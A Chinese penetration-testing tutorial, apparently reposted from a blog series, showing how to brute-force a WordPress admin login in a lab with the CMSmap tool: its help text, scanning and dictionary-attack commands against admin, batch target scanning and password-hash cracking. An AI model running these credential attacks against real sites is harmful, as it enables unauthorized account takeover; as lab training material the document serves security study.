46.网络安全渗透测试—[穷举篇9]—[wordpress博客后台破解]
作者:互联网
我认为:无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!
文章目录
一、常见cms穷举
1、wordpress穷举方法一:CMSmap
(1)CMSmap穷举工具下载地址:传送门
(2)KALI中下载该工具:
kali下运行:
git clone https://github.com/dionach/CMSmap
(3)KALI中使用CMSmap对靶机进行测试:
第一步:切换目录到当前目录下,-h查看用法
cd CMSmap
./cmsmap.py -h
=====================================================================================
用法:cmsmap.py[-f W/J/D/M][f][t][a][H][i][o][E][c][s][D][u][p][x][k][W][v][H][D][u][目标]
CMSmap工具v1。0-简单CMS扫描仪
作者:迈克·曼佐蒂
扫描:
目标URL(例如'https://example.com:8080/')
-f W/J/D/M,--力W/J/D/M,强制扫描(W)或(J)oomla或(D)rupal或(M)oodle
-F、 --使用大型插件列表进行完整扫描。假阳性和慢!
-t,--线程数线程数(默认值5)
--代理集自定义用户代理
-H,--标题添加自定义标题(例如“授权:基本ABCD…”)
-i,-input扫描给定文件中列出的多个目标
-o,--output将输出保存到文件中
-E、 --noedb枚举插件而不搜索漏洞
-c、 --NoCleanURL仅对Drupal禁用清除URL
-s、 --nosslcheck不验证服务器的证书
-d、 --dictattack在扫描期间运行低强度字典攻击(每个用户5次尝试)
暴力:
-u,--usr用户名或用户名文件
-p,--psw密码或密码文件
-x、 --不带XML-RPC的noxmlrpc暴力强制WordPress
剥削后:
-k,--crack密码哈希文件(需要安装hashcat。仅适用于WordPress和Joomla)
-w,--wordlist单词列表文件
其他:
-v、 --详细模式(默认为false)
-h、 --帮助显示此帮助消息并退出
-D、 --默认运行带有默认选项的CMSmap
-U,--更新使用(C)MSmap,(P)lugins或(PC)两者
示例:
cmsmap.py https://example.com
cmsmap.py https://example.com -f W -F --noedb -d
cmsmap.py https://example.com -i targets.txt -o output.txt
cmsmap.py https://example.com -u admin -p passwords.txt
cmsmap.py -k hashes.txt -w passwords.txt
=====================================================================================
第二步:开始测试
测试1:./cmsmap.py http://www.wordpress.com
如下所示:发现了登录页面wp-login.php
如下所示:登录页面应该是存在的
测试2:./cmsmap.py http://www.wordpress.com -u admin -p ./passwords.txt -v
其他测试姿势:
./cmsmap.py https://example.com
./cmsmap.py https://example.com -f W -F --noedb -d
./cmsmap.py https://example.com -i targets.txt -o output.txt
./cmsmap.py https://example.com -u admin -p passwords.txt
./cmsmap.py -k hashes.txt -w passwords.txt
批量扫描的方法:
./cmsmap.py -i ./wp.txt -u admin -p ./passwords.txt -v -o ./w.txt
(4)注意:需要配置/etc/hosts文件
靶机IP 域名
192.168.97.131 www.wordpress.com
2、wordpress穷举方法二:wpscan
标签:cmsmap,46,py,--,wordpress,https,穷举,txt,com 来源: https://blog.csdn.net/qq_45555226/article/details/122463345